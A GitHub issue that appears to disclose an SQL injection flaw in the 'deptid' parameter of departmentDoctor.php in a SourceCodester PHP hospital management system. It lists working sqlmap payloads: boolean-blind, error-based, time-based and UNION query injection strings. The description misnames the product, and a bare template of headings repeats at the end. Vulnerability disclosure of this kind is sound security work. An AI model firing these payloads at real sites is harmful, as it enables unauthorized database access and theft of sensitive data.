You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The fourth line of the departmentDoctor.php file uses the PHP method to retrieve user input from the $_GET element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the PHP method on line 5 of the departmentDoctor.php file. This may lead to SQL injection attacks
Impact
Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.
DESCRIPTION
ZhaoBin Huang has discovered that due to insufficient protection of the "deptid" parameter in the "\departmentDoctor.php" file, "Best courier management system project in php" there is a serious security vulnerability in the This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.database.
Payload
deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
---
Parameter: deptid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: deptid=12' AND 9424=9424 AND 'hYov'='hYov
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: deptid=12' AND (SELECT 3022 FROM (SELECT(SLEEP(5)))IfUz) AND 'rvxr'='rvxr
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: deptid=12' UNION ALL SELECT CONCAT(0x716b707671,0x6b5a4352647756625962434873434d55424c6d437a47745664726d4b736c52667772717653687444,0x71786a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
This is showing the payload implemented by running sqlmap
The following is the database name displayed as a successful implementation of the attack by running sqlmap
The text was updated successfully, but these errors were encountered:
SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
Payload
The text was updated successfully, but these errors were encountered: